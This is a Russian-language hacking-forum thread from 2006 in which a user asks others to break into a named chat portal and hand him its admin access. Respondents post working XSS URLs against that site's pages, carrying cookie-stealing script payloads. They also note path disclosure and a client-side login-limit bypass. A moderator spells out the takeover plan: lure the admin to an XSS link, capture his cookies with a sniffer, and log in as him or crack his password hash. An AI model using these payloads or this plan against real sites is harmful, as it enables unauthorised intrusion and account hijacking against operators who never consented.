Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Проверьте чат на уязвимость... |

01.05.2006, 17:32
|
|
Новичок
Регистрация: 13.04.2006
Сообщений: 28
Провел на форуме: 23484
Репутация:
2
|
|
Проверьте чат на уязвимость...
можете проверить чат на уязвимость и взломать его а то я не могу найти у не го уязвимости же который день помогите если можете выложте доступ к админ центру http://betachat.altnet.ru/ админ-создатель destroy
|
|
|

01.05.2006, 18:02
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме: 3212607
Репутация:
454
|
|
мда...
быстренько глянул...
нашёл две xss:
_http://betachat.altnet.ru/main.php?pg=krasa&show=10&size=0&u=<script>alert(d ocument.cookie)</script>
_http://betachat.altnet.ru/chat/chat2.php?uid=7269&uniq_id=9239445611473aecf&bg="> <script>alert(document.cookie)</script>
времени щас нет, попозже гляну
как я понял, там регистрационные данные подходят для всего: чата, форума, галлереи, самого сайта, etc... т.е. стащив куки можешь стать админом... а так судя по всему там уязвимостей дох?я...
жаль что там заливка файлов не работает, я думаю там тоже интересные моменты есть
|
|
|

01.05.2006, 18:49
|
|
Новичок
Регистрация: 13.04.2006
Сообщений: 28
Провел на форуме: 23484
Репутация:
2
|
|
форум не относится к порталу а он вообщм и не нужен exbb
Последний раз редактировалось LavInaL; 04.05.2006 в 19:52..
|
|
|

01.05.2006, 19:03
|
|
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме: 3238231
Репутация:
165
|
|
ну как всегда сначала попробовал зарегистрировать невидимый символ, получилось.
форум там Powered by ExBB 2.0.0.1, думаю что от IPB не отличаеться.
есть внутренняя почта, думаю через неё можно и кукисы админа получиться, но не проверял пока что.
|
|
|

01.05.2006, 22:18
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме: 3212607
Репутация:
454
|
|
форум не относится к порталу а он вообщм и не нужен exbb. Доступ к админ центру только
да, поспешил, но пох там и так всего много =)
есть внутренняя почта, думаю через неё можно и кукисы админа получиться, но не проверял пока что.
у меня не получается отправить вообще что-либо...
вот ещё:
_http://betachat.altnet.ru/main.php?pg=whois&SEARCH=1&nick="><script>alert(do cument.cookie)</script>
и никому не нужное раскрытие путей в гесте, если вместо ника и сообщения подставить что-нибудь из запрещённых символов ' " < >
|
|
|

02.05.2006, 11:55
|
|
Новичок
Регистрация: 13.04.2006
Сообщений: 28
Провел на форуме: 23484
Репутация:
2
|
|
А есть какой нибудь путь получить админку в самом портале?
Если знаете то опишите пожалуйста все действия как вы получили доступ к админ центру...
|
|
|

02.05.2006, 23:05
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме: 1204641
Репутация:
412
|
|
Если скрипту _http://betachat.altnet.ru/login.php передать <script>alert()</script> то выскочит алерт. Ограничение вводимого логина в 20 символов реализовано через HTML и нам ничегоне мешает его подправить на своем диске. А может и GET тоже можно это сделать..не знаю-легких путей не ищу=))
Последний раз редактировалось DRON-ANARCHY; 02.05.2006 в 23:10..
|
|
|

03.05.2006, 11:16
|
|
Новичок
Регистрация: 13.04.2006
Сообщений: 28
Провел на форуме: 23484
Репутация:
2
|
|
Есть ли вообще в сайте уязвимость в чем нибудь чтобы получить доступ к Админцентру
Последний раз редактировалось LavInaL; 04.05.2006 в 19:52..
|
|
|

03.05.2006, 11:21
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме: 13166814
Репутация:
3876
|
|
тебе же написали - XSS!
подсовываешь xss-ссылочку админу, он её открывает. тебе на сниф приходят его кукисы. ты залезаешь под них на чат и ты админ. или расшифровываешь хеш пароля и влезаешь в админцентр.
|
|
|

03.05.2006, 14:28
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме: 3212607
Репутация:
454
|
|
попробую сегодня капнуть дальше, скажу результаты...
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|